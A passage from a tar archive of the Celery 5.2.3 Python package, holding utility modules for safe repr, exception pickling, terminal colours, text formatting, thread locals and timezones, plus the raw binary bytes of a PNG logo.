len(it) for i, v in enumerate(it): yield v if i < (size - 1): yield LIT_LIST_SEP def _repr_empty_set(s): # type: (Set) -> str return f'{type(s).__name__}()' def _safetext(val): # type: (AnyStr) -> str if isinstance(val, bytes): try: val.encode('utf-8') except UnicodeDecodeError: # is bytes with unrepresentable characters, attempt # to convert back to unicode return val.decode('utf-8', errors='backslashreplace') return val def _format_binary_bytes(val, maxlen, ellipsis='...'): # type: (bytes, int, str) -> str if maxlen and len(val) > maxlen: # we don't want to copy all the data, just take what we need. chunk = memoryview(val)[:maxlen].tobytes() return _bytes_prefix(f"'{_repr_binary_bytes(chunk)}{ellipsis}'") return _bytes_prefix(f"'{_repr_binary_bytes(val)}'") def _bytes_prefix(s): return 'b' + s def _repr_binary_bytes(val): # type: (bytes) -> str try: return val.decode('utf-8') except UnicodeDecodeError: # possibly not unicode, but binary data so format as hex. try: ashex = val.hex except AttributeError: # pragma: no cover # Python 3.4 return val.decode('utf-8', errors='replace') else: # Python 3.5+ return ashex() def _format_chars(val, maxlen): # type: (AnyStr, int) -> str if isinstance(val, bytes): # pragma: no cover return _format_binary_bytes(val, maxlen) else: return "'{}'".format(truncate(val, maxlen).replace("'", "\\'")) def _repr(obj): # type: (Any) -> str try: return repr(obj) except Exception as exc: stack = '\n'.join(traceback.format_stack()) return f'' def _saferepr(o, maxlen=None, maxlevels=3, seen=None): # type: (Any, int, int, Set) -> str stack = deque([iter([o])]) for token, it in reprstream(stack, seen=seen, maxlevels=maxlevels): if maxlen is not None and maxlen <= 0: yield ', ...' # move rest back to stack, so that we can include # dangling parens. stack.append(it) break if isinstance(token, _literal): val = token.value elif isinstance(token, _key): val = saferepr(token.value, maxlen, maxlevels) elif isinstance(token, _quoted): val = _format_chars(token.value, maxlen) else: val = _safetext(truncate(token, maxlen)) yield val if maxlen is not None: maxlen -= len(val) for rest1 in stack: # maxlen exceeded, process any dangling parens. for rest2 in rest1: if isinstance(rest2, _literal) and not rest2.truncate: yield rest2.value def _reprseq(val, lit_start, lit_end, builtin_type, chainer): # type: (Sequence, _literal, _literal, Any, Any) -> Tuple[Any, ...] if type(val) is builtin_type: return lit_start, lit_end, chainer(val) return ( _literal(f'{type(val).__name__}({lit_start.value}', False, +1), _literal(f'{lit_end.value})', False, -1), chainer(val) ) def reprstream(stack, seen=None, maxlevels=3, level=0, isinstance=isinstance): """Streaming repr, yielding tokens.""" # type: (deque, Set, int, int, Callable) -> Iterator[Any] seen = seen or set() append = stack.append popleft = stack.popleft is_in_seen = seen.__contains__ discard_from_seen = seen.discard add_to_seen = seen.add while stack: lit_start = lit_end = None it = popleft() for val in it: orig = val if isinstance(val, _dirty): discard_from_seen(val.objid) continue elif isinstance(val, _literal): level += val.direction yield val, it elif isinstance(val, _key): yield val, it elif isinstance(val, Decimal): yield _repr(val), it elif isinstance(val, safe_t): yield str(val), it elif isinstance(val, chars_t): yield _quoted(val), it elif isinstance(val, range): # pragma: no cover yield _repr(val), it else: if isinstance(val, set_t): if not val: yield _repr_empty_set(val), it continue lit_start, lit_end, val = _reprseq( val, LIT_SET_START, LIT_SET_END, set, _chainlist, ) elif isinstance(val, tuple): lit_start, lit_end, val = ( LIT_TUPLE_START, LIT_TUPLE_END_SV if len(val) == 1 else LIT_TUPLE_END, _chainlist(val)) elif isinstance(val, dict): lit_start, lit_end, val = ( LIT_DICT_START, LIT_DICT_END, _chaindict(val)) elif isinstance(val, list): lit_start, lit_end, val = ( LIT_LIST_START, LIT_LIST_END, _chainlist(val)) else: # other type of object yield _repr(val), it continue if maxlevels and level >= maxlevels: yield f'{lit_start.value}...{lit_end.value}', it continue objid = id(orig) if is_in_seen(objid): yield _recursion(orig), it continue add_to_seen(objid) # Recurse into the new list/tuple/dict/etc by tacking # the rest of our iterable onto the new it: this way # it works similar to a linked list. append(chain([lit_start], val, [_dirty(objid), lit_end], it)) break ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/serialization.py0000664000175000017500000001755300000000000020562 0ustar00asifasif00000000000000"""Utilities for safely pickling exceptions.""" import datetime import numbers import sys from base64 import b64decode as base64decode from base64 import b64encode as base64encode from functools import partial from inspect import getmro from itertools import takewhile from kombu.utils.encoding import bytes_to_str, safe_repr, str_to_bytes try: import cPickle as pickle except ImportError: import pickle __all__ = ( 'UnpickleableExceptionWrapper', 'subclass_exception', 'find_pickleable_exception', 'create_exception_cls', 'get_pickleable_exception', 'get_pickleable_etype', 'get_pickled_exception', 'strtobool', ) #: List of base classes we probably don't want to reduce to. unwanted_base_classes = (Exception, BaseException, object) STRTOBOOL_DEFAULT_TABLE = {'false': False, 'no': False, '0': False, 'true': True, 'yes': True, '1': True, 'on': True, 'off': False} def subclass_exception(name, parent, module): """Create new exception class.""" return type(name, (parent,), {'__module__': module}) def find_pickleable_exception(exc, loads=pickle.loads, dumps=pickle.dumps): """Find first pickleable exception base class. With an exception instance, iterate over its super classes (by MRO) and find the first super exception that's pickleable. It does not go below :exc:`Exception` (i.e., it skips :exc:`Exception`, :class:`BaseException` and :class:`object`). If that happens you should use :exc:`UnpickleableException` instead. Arguments: exc (BaseException): An exception instance. loads: decoder to use. dumps: encoder to use Returns: Exception: Nearest pickleable parent exception class (except :exc:`Exception` and parents), or if the exception is pickleable it will return :const:`None`. """ exc_args = getattr(exc, 'args', []) for supercls in itermro(exc.__class__, unwanted_base_classes): try: superexc = supercls(*exc_args) loads(dumps(superexc)) except Exception: # pylint: disable=broad-except pass else: return superexc def itermro(cls, stop): return takewhile(lambda sup: sup not in stop, getmro(cls)) def create_exception_cls(name, module, parent=None): """Dynamically create an exception class.""" if not parent: parent = Exception return subclass_exception(name, parent, module) def ensure_serializable(items, encoder): """Ensure items will serialize. For a given list of arbitrary objects, return the object or a string representation, safe for serialization. Arguments: items (Iterable[Any]): Objects to serialize. encoder (Callable): Callable function to serialize with. """ safe_exc_args = [] for arg in items: try: encoder(arg) safe_exc_args.append(arg) except Exception: # pylint: disable=broad-except safe_exc_args.append(safe_repr(arg)) return tuple(safe_exc_args) class UnpickleableExceptionWrapper(Exception): """Wraps unpickleable exceptions. Arguments: exc_module (str): See :attr:`exc_module`. exc_cls_name (str): See :attr:`exc_cls_name`. exc_args (Tuple[Any, ...]): See :attr:`exc_args`. Example: >>> def pickle_it(raising_function): ... try: ... raising_function() ... except Exception as e: ... exc = UnpickleableExceptionWrapper( ... e.__class__.__module__, ... e.__class__.__name__, ... e.args, ... ) ... pickle.dumps(exc) # Works fine. """ #: The module of the original exception. exc_module = None #: The name of the original exception class. exc_cls_name = None #: The arguments for the original exception. exc_args = None def __init__(self, exc_module, exc_cls_name, exc_args, text=None): safe_exc_args = ensure_serializable(exc_args, pickle.dumps) self.exc_module = exc_module self.exc_cls_name = exc_cls_name self.exc_args = safe_exc_args self.text = text super().__init__(exc_module, exc_cls_name, safe_exc_args, text) def restore(self): return create_exception_cls(self.exc_cls_name, self.exc_module)(*self.exc_args) def __str__(self): return self.text @classmethod def from_exception(cls, exc): return cls(exc.__class__.__module__, exc.__class__.__name__, getattr(exc, 'args', []), safe_repr(exc)) def get_pickleable_exception(exc): """Make sure exception is pickleable.""" try: pickle.loads(pickle.dumps(exc)) except Exception: # pylint: disable=broad-except pass else: return exc nearest = find_pickleable_exception(exc) if nearest: return nearest return UnpickleableExceptionWrapper.from_exception(exc) def get_pickleable_etype(cls, loads=pickle.loads, dumps=pickle.dumps): """Get pickleable exception type.""" try: loads(dumps(cls)) except Exception: # pylint: disable=broad-except return Exception else: return cls def get_pickled_exception(exc): """Reverse of :meth:`get_pickleable_exception`.""" if isinstance(exc, UnpickleableExceptionWrapper): return exc.restore() return exc def b64encode(s): return bytes_to_str(base64encode(str_to_bytes(s))) def b64decode(s): return base64decode(str_to_bytes(s)) def strtobool(term, table=None): """Convert common terms for true/false to bool. Examples (true/false/yes/no/on/off/1/0). """ if table is None: table = STRTOBOOL_DEFAULT_TABLE if isinstance(term, str): try: return table[term.lower()] except KeyError: raise TypeError(f'Cannot coerce {term!r} to type bool') return term def _datetime_to_json(dt): # See "Date Time String Format" in the ECMA-262 specification. if isinstance(dt, datetime.datetime): r = dt.isoformat() if dt.microsecond: r = r[:23] + r[26:] if r.endswith('+00:00'): r = r[:-6] + 'Z' return r elif isinstance(dt, datetime.time): r = dt.isoformat() if dt.microsecond: r = r[:12] return r else: return dt.isoformat() def jsonify(obj, builtin_types=(numbers.Real, str), key=None, keyfilter=None, unknown_type_filter=None): """Transform object making it suitable for json serialization.""" from kombu.abstract import Object as KombuDictType _jsonify = partial(jsonify, builtin_types=builtin_types, key=key, keyfilter=keyfilter, unknown_type_filter=unknown_type_filter) if isinstance(obj, KombuDictType): obj = obj.as_dict(recurse=True) if obj is None or isinstance(obj, builtin_types): return obj elif isinstance(obj, (tuple, list)): return [_jsonify(v) for v in obj] elif isinstance(obj, dict): return { k: _jsonify(v, key=k) for k, v in obj.items() if (keyfilter(k) if keyfilter else 1) } elif isinstance(obj, (datetime.date, datetime.time)): return _datetime_to_json(obj) elif isinstance(obj, datetime.timedelta): return str(obj) else: if unknown_type_filter is None: raise ValueError( f'Unsupported type: {type(obj)!r} {obj!r} (parent: {key})' ) return unknown_type_filter(obj) def raise_with_context(exc): exc_info = sys.exc_info() if not exc_info: raise exc elif exc_info[1] is exc: raise raise exc from exc_info[1] ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4957514 celery-5.2.3/celery/utils/static/0000775000175000017500000000000000000000000016607 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/static/__init__.py0000664000175000017500000000045300000000000020722 0ustar00asifasif00000000000000"""Static files.""" import os def get_file(*args): # type: (*str) -> str """Get filename for static file.""" return os.path.join(os.path.abspath(os.path.dirname(__file__)), *args) def logo(): # type: () -> bytes """Celery logo image.""" return get_file('celery_128.png') ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/static/celery_128.png0000664000175000017500000000477400000000000021206 0ustar00asifasif00000000000000PNG  IHDR>atEXtSoftwareAdobe ImageReadyqe<(iTXtXML:com.adobe.xmp MjIDATxOLUο-?Z9&h8jMSMA̓'̓/&5Kѓh0T5bC33^aqׂ<1~Yx3~ۙ}SeY ܿHx         v xY}ʹjzjU*<ϯF#)Z4Hr=_kTTP}5x(zH២5/pHp!Ձ𳼘7, x>x8I~k? @uëA]2V+H/Q"qJK&m _p/X]-C.n D,Qvn_qq3)U>| e4sIR@ ao u'j ]eyS֮ QqG^JXjLUJE_RЩB `XdIaձ~Їl>Wi< nAG솟 !]v~LՕo{wo#x ;RO)#D.|/taYf/ivձkuq'i zqë>?tǷvEU]o~k=ia~`d#ٻ?븫a(VDDq Zf#Ӳu'Bn 0HĒ6e{f%"e,m6;<Կ .#i[GWk!f} 8*| D"X䬝fB?Iu : ,i/ޝ% d'8H3Om'$A00־Y bۜO$谻;;"xUK]MQ_ 1yCdÉ&l)Ht29 XxkJ\>5\|u{EXoم)77g|Aㅞ-|z3L=%Rɼ^*ブ`Ħ=ƋQvY8 3nL&f46;3-fH%Y8%6NFV4hEO e}]-IF≂ȑAQID#Yܐ@vϤR=(GbuUm2x|쁏zUQYo!1&f1DC=c F^70F1T4E|'MxO/ cqDVuyl$PE,O6 3:rWhN]!Y=c>d-         _ Wa]ṈIENDB`././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/sysinfo.py0000664000175000017500000000207500000000000017370 0ustar00asifasif00000000000000"""System information utilities.""" import os from math import ceil from kombu.utils.objects import cached_property __all__ = ('load_average', 'df') if hasattr(os, 'getloadavg'): def _load_average(): return tuple(ceil(l * 1e2) / 1e2 for l in os.getloadavg()) else: # pragma: no cover # Windows doesn't have getloadavg def _load_average(): return (0.0, 0.0, 0.0) def load_average(): """Return system load average as a triple.""" return _load_average() class df: """Disk information.""" def __init__(self, path): self.path = path @property def total_blocks(self): return self.stat.f_blocks * self.stat.f_frsize / 1024 @property def available(self): return self.stat.f_bavail * self.stat.f_frsize / 1024 @property def capacity(self): avail = self.stat.f_bavail used = self.stat.f_blocks - self.stat.f_bfree return int(ceil(used * 100.0 / (used + avail) + 0.5)) @cached_property def stat(self): return os.statvfs(os.path.abspath(self.path)) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/term.py0000664000175000017500000001073000000000000016642 0ustar00asifasif00000000000000"""Terminals and colors.""" import base64 import codecs import os import platform import sys from functools import reduce from celery.platforms import isatty __all__ = ('colored',) BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8) OP_SEQ = '\033[%dm' RESET_SEQ = '\033[0m' COLOR_SEQ = '\033[1;%dm' IS_WINDOWS = platform.system() == 'Windows' ITERM_PROFILE = os.environ.get('ITERM_PROFILE') TERM = os.environ.get('TERM') TERM_IS_SCREEN = TERM and TERM.startswith('screen') # tmux requires unrecognized OSC sequences to be wrapped with DCS tmux; # ST, and for all ESCs in to be replaced with ESC ESC. # It only accepts ESC backslash for ST. _IMG_PRE = '\033Ptmux;\033\033]' if TERM_IS_SCREEN else '\033]' _IMG_POST = '\a\033\\' if TERM_IS_SCREEN else '\a' def fg(s): return COLOR_SEQ % s class colored: """Terminal colored text. Example: >>> c = colored(enabled=True) >>> print(str(c.red('the quick '), c.blue('brown ', c.bold('fox ')), ... c.magenta(c.underline('jumps over')), ... c.yellow(' the lazy '), ... c.green('dog '))) """ def __init__(self, *s, **kwargs): self.s = s self.enabled = not IS_WINDOWS and kwargs.get('enabled', True) self.op = kwargs.get('op', '') self.names = { 'black': self.black, 'red': self.red, 'green': self.green, 'yellow': self.yellow, 'blue': self.blue, 'magenta': self.magenta, 'cyan': self.cyan, 'white': self.white, } def _add(self, a, b): return str(a) + str(b) def _fold_no_color(self, a, b): try: A = a.no_color() except AttributeError: A = str(a) try: B = b.no_color() except AttributeError: B = str(b) return ''.join((str(A), str(B))) def no_color(self): if self.s: return str(reduce(self._fold_no_color, self.s)) return '' def embed(self): prefix = '' if self.enabled: prefix = self.op return ''.join((str(prefix), str(reduce(self._add, self.s)))) def __str__(self): suffix = '' if self.enabled: suffix = RESET_SEQ return str(''.join((self.embed(), str(suffix)))) def node(self, s, op): return self.__class__(enabled=self.enabled, op=op, *s) def black(self, *s): return self.node(s, fg(30 + BLACK)) def red(self, *s): return self.node(s, fg(30 + RED)) def green(self, *s): return self.node(s, fg(30 + GREEN)) def yellow(self, *s): return self.node(s, fg(30 + YELLOW)) def blue(self, *s): return self.node(s, fg(30 + BLUE)) def magenta(self, *s): return self.node(s, fg(30 + MAGENTA)) def cyan(self, *s): return self.node(s, fg(30 + CYAN)) def white(self, *s): return self.node(s, fg(30 + WHITE)) def __repr__(self): return repr(self.no_color()) def bold(self, *s): return self.node(s, OP_SEQ % 1) def underline(self, *s): return self.node(s, OP_SEQ % 4) def blink(self, *s): return self.node(s, OP_SEQ % 5) def reverse(self, *s): return self.node(s, OP_SEQ % 7) def bright(self, *s): return self.node(s, OP_SEQ % 8) def ired(self, *s): return self.node(s, fg(40 + RED)) def igreen(self, *s): return self.node(s, fg(40 + GREEN)) def iyellow(self, *s): return self.node(s, fg(40 + YELLOW)) def iblue(self, *s): return self.node(s, fg(40 + BLUE)) def imagenta(self, *s): return self.node(s, fg(40 + MAGENTA)) def icyan(self, *s): return self.node(s, fg(40 + CYAN)) def iwhite(self, *s): return self.node(s, fg(40 + WHITE)) def reset(self, *s): return self.node(s or [''], RESET_SEQ) def __add__(self, other): return str(self) + str(other) def supports_images(): return isatty(sys.stdin) and ITERM_PROFILE def _read_as_base64(path): with codecs.open(path, mode='rb') as fh: encoded = base64.b64encode(fh.read()) return encoded if type(encoded) == 'str' else encoded.decode('ascii') def imgcat(path, inline=1, preserve_aspect_ratio=0, **kwargs): return '\n%s1337;File=inline=%d;preserveAspectRatio=%d:%s%s' % ( _IMG_PRE, inline, preserve_aspect_ratio, _read_as_base64(path), _IMG_POST) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/utils/text.py0000664000175000017500000001327000000000000016661 0ustar00asifasif00000000000000"""Text formatting utilities.""" import io import re from collections.abc import Callable from functools import partial from pprint import pformat from textwrap import fill from typing import Any, List, Mapping, Pattern __all__ = ( 'abbr', 'abbrtask', 'dedent', 'dedent_initial', 'ensure_newlines', 'ensure_sep', 'fill_paragraphs', 'indent', 'join', 'pluralize', 'pretty', 'str_to_list', 'simple_format', 'truncate', ) UNKNOWN_SIMPLE_FORMAT_KEY = """ Unknown format %{0} in string {1!r}. Possible causes: Did you forget to escape the expand sign (use '%%{0!r}'), or did you escape and the value was expanded twice? (%%N -> %N -> %hostname)? """.strip() RE_FORMAT = re.compile(r'%(\w)') def str_to_list(s): # type: (str) -> List[str] """Convert string to list.""" if isinstance(s, str): return s.split(',') return s def dedent_initial(s, n=4): # type: (str, int) -> str """Remove indentation from first line of text.""" return s[n:] if s[:n] == ' ' * n else s def dedent(s, n=4, sep='\n'): # type: (str, int, str) -> str """Remove indentation.""" return sep.join(dedent_initial(l) for l in s.splitlines()) def fill_paragraphs(s, width, sep='\n'): # type: (str, int, str) -> str """Fill paragraphs with newlines (or custom separator).""" return sep.join(fill(p, width) for p in s.split(sep)) def join(l, sep='\n'): # type: (str, str) -> str """Concatenate list of strings.""" return sep.join(v for v in l if v) def ensure_sep(sep, s, n=2): # type: (str, str, int) -> str """Ensure text s ends in separator sep'.""" return s + sep * (n - s.count(sep)) ensure_newlines = partial(ensure_sep, '\n') def abbr(S, max, ellipsis='...'): # type: (str, int, str) -> str """Abbreviate word.""" if S is None: return '???' if len(S) > max: return ellipsis and (S[:max - len(ellipsis)] + ellipsis) or S[:max] return S def abbrtask(S, max): # type: (str, int) -> str """Abbreviate task name.""" if S is None: return '???' if len(S) > max: module, _, cls = S.rpartition('.') module = abbr(module, max - len(cls) - 3, False) return module + '[.]' + cls return S def indent(t, indent=0, sep='\n'): # type: (str, int, str) -> str """Indent text.""" return sep.join(' ' * indent + p for p in t.split(sep)) def truncate(s, maxlen=128, suffix='...'): # type: (str, int, str) -> str """Truncate text to a maximum number of characters.""" if maxlen and len(s) >= maxlen: return s[:maxlen].rsplit(' ', 1)[0] + suffix return s def pluralize(n, text, suffix='s'): # type: (int, str, str) -> str """Pluralize term when n is greater than one.""" if n != 1: return text + suffix return text def pretty(value, width=80, nl_width=80, sep='\n', **kw): # type: (str, int, int, str, **Any) -> str """Format value for printing to console.""" if isinstance(value, dict): return f'{{{sep} {pformat(value, 4, nl_width)[1:]}' elif isinstance(value, tuple): return '{}{}{}'.format( sep, ' ' * 4, pformat(value, width=nl_width, **kw), ) else: return pformat(value, width=width, **kw) def match_case(s, other): # type: (str, str) -> str return s.upper() if other.isupper() else s.lower() def simple_format(s, keys, pattern=RE_FORMAT, expand=r'\1'): # type: (str, Mapping[str, str], Pattern, str) -> str """Format string, expanding abbreviations in keys'.""" if s: keys.setdefault('%', '%') def resolve(match): key = match.expand(expand) try: resolver = keys[key] except KeyError: raise ValueError(UNKNOWN_SIMPLE_FORMAT_KEY.format(key, s)) if isinstance(resolver, Callable): return resolver() return resolver return pattern.sub(resolve, s) return s def remove_repeating_from_task(task_name, s): # type: (str, str) -> str """Given task name, remove repeating module names. Example: >>> remove_repeating_from_task( ... 'tasks.add', ... 'tasks.add(2, 2), tasks.mul(3), tasks.div(4)') 'tasks.add(2, 2), mul(3), div(4)' """ # This is used by e.g. repr(chain), to remove repeating module names. # - extract the module part of the task name module = str(task_name).rpartition('.')[0] + '.' return remove_repeating(module, s) def remove_repeating(substr, s): # type: (str, str) -> str """Remove repeating module names from string. Arguments: task_name (str): Task name (full path including module), to use as the basis for removing module names. s (str): The string we want to work on. Example: >>> _shorten_names( ... 'x.tasks.add', ... 'x.tasks.add(2, 2) | x.tasks.add(4) | x.tasks.mul(8)', ... ) 'x.tasks.add(2, 2) | add(4) | mul(8)' """ # find the first occurrence of substr in the string. index = s.find(substr) if index >= 0: return ''.join([ # leave the first occurrence of substr untouched. s[:index + len(substr)], # strip seen substr from the rest of the string. s[index + len(substr):].replace(substr, ''), ]) return s StringIO = io.StringIO _SIO_write = StringIO.write _SIO_init = StringIO.__init__ class WhateverIO(StringIO): """StringIO that takes bytes or str.""" def __init__(self, v=None, *a, **kw): _SIO_init(self, v.decode() if isinstance(v, bytes) else v, *a, **kw) def write(self, data): _SIO_write(self, data.decode() if isinstance(data, bytes) else data) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/utils/threads.py0000664000175000017500000002257000000000000017332 0ustar00asifasif00000000000000"""Threading primitives and utilities.""" import os import socket import sys import threading import traceback from contextlib import contextmanager from threading import TIMEOUT_MAX as THREAD_TIMEOUT_MAX from celery.local import Proxy try: from greenlet import getcurrent as get_ident except ImportError: # pragma: no cover try: from _thread import get_ident except ImportError: try: from thread import get_ident except ImportError: # pragma: no cover try: from _dummy_thread import get_ident except ImportError: from dummy_thread import get_ident __all__ = ( 'bgThread', 'Local', 'LocalStack', 'LocalManager', 'get_ident', 'default_socket_timeout', ) USE_FAST_LOCALS = os.environ.get('USE_FAST_LOCALS') @contextmanager def default_socket_timeout(timeout): """Context temporarily setting the default socket timeout.""" prev = socket.getdefaulttimeout() socket.setdefaulttimeout(timeout) yield socket.setdefaulttimeout(prev) class bgThread(threading.Thread): """Background service thread.""" def __init__(self, name=None, **kwargs): super().__init__() self.__is_shutdown = threading.Event() self.__is_stopped = threading.Event() self.daemon = True self.name = name or self.__class__.__name__ def body(self): raise NotImplementedError() def on_crash(self, msg, *fmt, **kwargs): print(msg.format(*fmt), file=sys.stderr) traceback.print_exc(None, sys.stderr) def run(self): body = self.body shutdown_set = self.__is_shutdown.is_set try: while not shutdown_set(): try: body() except Exception as exc: # pylint: disable=broad-except try: self.on_crash('{0!r} crashed: {1!r}', self.name, exc) self._set_stopped() finally: sys.stderr.flush() os._exit(1) # exiting by normal means won't work finally: self._set_stopped() def _set_stopped(self): try: self.__is_stopped.set() except TypeError: # pragma: no cover # we lost the race at interpreter shutdown, # so gc collected built-in modules. pass def stop(self): """Graceful shutdown.""" self.__is_shutdown.set() self.__is_stopped.wait() if self.is_alive(): self.join(THREAD_TIMEOUT_MAX) def release_local(local): """Release the contents of the local for the current context. This makes it possible to use locals without a manager. With this function one can release :class:`Local` objects as well as :class:`StackLocal` objects. However it's not possible to release data held by proxies that way, one always has to retain a reference to the underlying local object in order to be able to release it. Example: >>> loc = Local() >>> loc.foo = 42 >>> release_local(loc) >>> hasattr(loc, 'foo') False """ local.__release_local__() class Local: """Local object.""" __slots__ = ('__storage__', '__ident_func__') def __init__(self): object.__setattr__(self, '__storage__', {}) object.__setattr__(self, '__ident_func__', get_ident) def __iter__(self): return iter(self.__storage__.items()) def __call__(self, proxy): """Create a proxy for a name.""" return Proxy(self, proxy) def __release_local__(self): self.__storage__.pop(self.__ident_func__(), None) def __getattr__(self, name): try: return self.__storage__[self.__ident_func__()][name] except KeyError: raise AttributeError(name) def __setattr__(self, name, value): ident = self.__ident_func__() storage = self.__storage__ try: storage[ident][name] = value except KeyError: storage[ident] = {name: value} def __delattr__(self, name): try: del self.__storage__[self.__ident_func__()][name] except KeyError: raise AttributeError(name) class _LocalStack: """Local stack. This class works similar to a :class:`Local` but keeps a stack of objects instead. This is best explained with an example:: >>> ls = LocalStack() >>> ls.push(42) >>> ls.top 42 >>> ls.push(23) >>> ls.top 23 >>> ls.pop() 23 >>> ls.top 42 They can be force released by using a :class:`LocalManager` or with the :func:`release_local` function but the correct way is to pop the item from the stack after using. When the stack is empty it will no longer be bound to the current context (and as such released). By calling the stack without arguments it will return a proxy that resolves to the topmost item on the stack. """ def __init__(self): self._local = Local() def __release_local__(self): self._local.__release_local__() def _get__ident_func__(self): return self._local.__ident_func__ def _set__ident_func__(self, value): object.__setattr__(self._local, '__ident_func__', value) __ident_func__ = property(_get__ident_func__, _set__ident_func__) del _get__ident_func__, _set__ident_func__ def __call__(self): def _lookup(): rv = self.top if rv is None: raise RuntimeError('object unbound') return rv return Proxy(_lookup) def push(self, obj): """Push a new item to the stack.""" rv = getattr(self._local, 'stack', None) if rv is None: # pylint: disable=assigning-non-slot # This attribute is defined now. self._local.stack = rv = [] rv.append(obj) return rv def pop(self): """Remove the topmost item from the stack. Note: Will return the old value or `None` if the stack was already empty. """ stack = getattr(self._local, 'stack', None) if stack is None: return None elif len(stack) == 1: release_local(self._local) return stack[-1] else: return stack.pop() def __len__(self): stack = getattr(self._local, 'stack', None) return len(stack) if stack else 0 @property def stack(self): # get_current_worker_task uses this to find # the original task that was executed by the worker. stack = getattr(self._local, 'stack', None) if stack is not None: return stack return [] @property def top(self): """The topmost item on the stack. Note: If the stack is empty, :const:`None` is returned. """ try: return self._local.stack[-1] except (AttributeError, IndexError): return None class LocalManager: """Local objects cannot manage themselves. For that you need a local manager. You can pass a local manager multiple locals or add them later by appending them to ``manager.locals``. Every time the manager cleans up, it will clean up all the data left in the locals for this context. The ``ident_func`` parameter can be added to override the default ident function for the wrapped locals. """ def __init__(self, locals=None, ident_func=None): if locals is None: self.locals = [] elif isinstance(locals, Local): self.locals = [locals] else: self.locals = list(locals) if ident_func is not None: self.ident_func = ident_func for local in self.locals: object.__setattr__(local, '__ident_func__', ident_func) else: self.ident_func = get_ident def get_ident(self): """Return context identifier. This is the identifier the local objects use internally for this context. You cannot override this method to change the behavior but use it to link other context local objects (such as SQLAlchemy's scoped sessions) to the Werkzeug locals. """ return self.ident_func() def cleanup(self): """Manually clean up the data in the locals for this context. Call this at the end of the request or use ``make_middleware()``. """ for local in self.locals: release_local(local) def __repr__(self): return '<{} storages: {}>'.format( self.__class__.__name__, len(self.locals)) class _FastLocalStack(threading.local): def __init__(self): self.stack = [] self.push = self.stack.append self.pop = self.stack.pop super().__init__() @property def top(self): try: return self.stack[-1] except (AttributeError, IndexError): return None def __len__(self): return len(self.stack) if USE_FAST_LOCALS: # pragma: no cover LocalStack = _FastLocalStack else: # pragma: no cover # - See #706 # since each thread has its own greenlet we can just use those as # identifiers for the context. If greenlets aren't available we # fall back to the current thread ident. LocalStack = _LocalStack ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/time.py0000664000175000017500000003012400000000000016630 0ustar00asifasif00000000000000"""Utilities related to dates, times, intervals, and timezones.""" import numbers import os import random import time as _time from calendar import monthrange from datetime import date, datetime, timedelta, tzinfo from kombu.utils.functional import reprcall from kombu.utils.objects import cached_property from pytz import AmbiguousTimeError, FixedOffset from pytz import timezone as _timezone from pytz import utc from .functional import dictfilter from .iso8601 import parse_iso8601 from .text import pluralize __all__ = ( 'LocalTimezone', 'timezone', 'maybe_timedelta', 'delta_resolution', 'remaining', 'rate', 'weekday', 'humanize_seconds', 'maybe_iso8601', 'is_naive', 'make_aware', 'localize', 'to_utc', 'maybe_make_aware', 'ffwd', 'utcoffset', 'adjust_timestamp', 'get_exponential_backoff_interval', ) C_REMDEBUG = os.environ.get('C_REMDEBUG', False) DAYNAMES = 'sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat' WEEKDAYS = dict(zip(DAYNAMES, range(7))) RATE_MODIFIER_MAP = { 's': lambda n: n, 'm': lambda n: n / 60.0, 'h': lambda n: n / 60.0 / 60.0, } TIME_UNITS = ( ('day', 60 * 60 * 24.0, lambda n: format(n, '.2f')), ('hour', 60 * 60.0, lambda n: format(n, '.2f')), ('minute', 60.0, lambda n: format(n, '.2f')), ('second', 1.0, lambda n: format(n, '.2f')), ) ZERO = timedelta(0) _local_timezone = None class LocalTimezone(tzinfo): """Local time implementation. Note: Used only when the :setting:`enable_utc` setting is disabled. """ _offset_cache = {} def __init__(self): # This code is moved in __init__ to execute it as late as possible # See get_default_timezone(). self.STDOFFSET = timedelta(seconds=-_time.timezone) if _time.daylight: self.DSTOFFSET = timedelta(seconds=-_time.altzone) else: self.DSTOFFSET = self.STDOFFSET self.DSTDIFF = self.DSTOFFSET - self.STDOFFSET super().__init__() def __repr__(self): return f'' def utcoffset(self, dt): return self.DSTOFFSET if self._isdst(dt) else self.STDOFFSET def dst(self, dt): return self.DSTDIFF if self._isdst(dt) else ZERO def tzname(self, dt): return _time.tzname[self._isdst(dt)] def fromutc(self, dt): # The base tzinfo class no longer implements a DST # offset aware .fromutc() in Python 3 (Issue #2306). # I'd rather rely on pytz to do this, than port # the C code from cpython's fromutc [asksol] offset = int(self.utcoffset(dt).seconds / 60.0) try: tz = self._offset_cache[offset] except KeyError: tz = self._offset_cache[offset] = FixedOffset(offset) return tz.fromutc(dt.replace(tzinfo=tz)) def _isdst(self, dt): tt = (dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, dt.weekday(), 0, 0) stamp = _time.mktime(tt) tt = _time.localtime(stamp) return tt.tm_isdst > 0 class _Zone: def tz_or_local(self, tzinfo=None): # pylint: disable=redefined-outer-name if tzinfo is None: return self.local return self.get_timezone(tzinfo) def to_local(self, dt, local=None, orig=None): if is_naive(dt): dt = make_aware(dt, orig or self.utc) return localize(dt, self.tz_or_local(local)) def to_system(self, dt): # tz=None is a special case since Python 3.3, and will # convert to the current local timezone (Issue #2306). return dt.astimezone(tz=None) def to_local_fallback(self, dt): if is_naive(dt): return make_aware(dt, self.local) return localize(dt, self.local) def get_timezone(self, zone): if isinstance(zone, str): return _timezone(zone) return zone 